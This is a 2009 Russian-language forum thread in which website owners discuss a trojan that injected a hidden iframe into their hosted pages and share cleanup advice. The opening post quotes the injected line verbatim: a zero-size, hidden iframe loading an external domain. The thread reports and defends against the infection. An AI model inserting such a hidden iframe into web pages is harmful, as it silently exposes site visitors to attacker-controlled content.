Ифрамский троян
1. CXMOBILE (30.03.2009 / 11:18)Словил вчера троян,он вшивает во все страницы сайта
<iframe src="http://tosto-vik.ru/index.php?sall=Bad" width="0" height="0" style="display:none;"></iframe>словил не на комп или тел.
Пришлось перезалить все.
з.ы. Написал чисто для осведомления.
Прошу закрыть тему.
2. CXMOBILE (30.03.2009 / 11:28)
З.ы Хост на бест хостере
3. Дмитрий (30.03.2009 / 11:51)
Total Comander ?
4. Славик (30.03.2009 / 13:38)
тоже самое. и у меня два хостинга. как удалить эту заразу?
5. Ден (30.03.2009 / 13:42)
бест ломанули вроде! мне на мыло новость приходила как подписчику что бы пароль сменил..
6. ктулху (30.03.2009 / 14:03)
Это троян на Total Comander
7. vantilo (30.03.2009 / 14:26)
В случае обнаружения следов вируса необходимо выполнить следующие действия с обязательным соблюдением порядка:
1. Проверить нет ли чужих скриптов на ftp
2. Удалить все лишние коды iframe и javascript со страниц
3. Сменить ftp-клиент и браузер. Поставить новые версии, скаченные с
сайтов-производителей.
4. Поставить фаервол
5. Сменить все пароли
6. Не сохранять пароли в программах на компьютере. Вводить каждый раз.
8. Александр (30.03.2009 / 18:07)
а можно подробней как с ним бороться,а сегодня с ума сходил,думал откуда это взялось:-)
9. Удаленный (30.03.2009 / 18:25)
Перезалей сайт.если он у тя на компе есть.
10. Игорь (30.03.2009 / 18:31)
8, сначало проскань весь комп, Советую каспером, лмбо др.Веб, у меня был пожий вирус)))
11. Удаленный (30.03.2009 / 18:41)
ЕТо бест хостер! Внимание! С нас делают лохов! Мне пришло на мыло письмо от бест хостера типа траляля смените пассы от спанели и проверьте свои компы и ноуты на трояны. ну я думаю идите фпопу и так все норм комп чист - ага х! Вчера смотрю - на сайте ошибко , захожу на фтп - тютю индексы поражены все!
12. Удаленный (30.03.2009 / 18:43)
Так что они походу сами базу паролей или что там у них просрали и делают пользователей тупыми - мол нефик с компом зараженым лезть .
И ваще ето может быть не только тотал командер виновный а ета Файлзилла
13. Александр (30.03.2009 / 19:12)
12#согласен filezila виновата,тоталом не пользовался. Вот это тоже вирус? http://e-street.org.ru/download/?cat=28
14. Николай (30.03.2009 / 21:04)
Я только с телефона редактировал. У меня в индекс.пых лишние строки появились и ошибка.
15. Vavan (30.03.2009 / 21:47)
тотал и то, с чего вы редктируете не причем !!! это чисто проблема хостинга.... у меня тотале более 20 закладок на разные акки разных хостров...и тока на одном хосте фреймы в индексах....
16. Vavan (30.03.2009 / 21:49)
кстати, когда то был акк на бесте, так эти фреймы у них нормальное явление..на письма что ЭТО? - несли чушь какуюто.... теперь у меня беста нет. и не будет!
17. CXMOBILE (30.03.2009 / 22:09)
Смена паролей обьясняется лишь тем что хостер предполагает возможность проникновения трояна в цпанель.
18. CXMOBILE (30.03.2009 / 22:14)
Да,и еще у меня там форум пхпббвап6 на субдомене стоит,так там нет трояна
19. Удаленный (30.03.2009 / 22:57)
написало свой ср@№ый код в файл index.php и default.php - пасс сменил стало ок. а так каждый час скрипт заходил на фтп и записывал говнокод в файлы, поддомен тоже не пострадал неодин.
20. Сергей (31.03.2009 / 00:25)
http://visavi.net/forum/index.php?fid=11&id=123402874651&
а поиск для чего здесь? описывал эту проблему не так давно.
21. Neformat (18.04.2009 / 23:41)
Тема закрыта для обсуждения!
URL: https://visavi.net/topics/613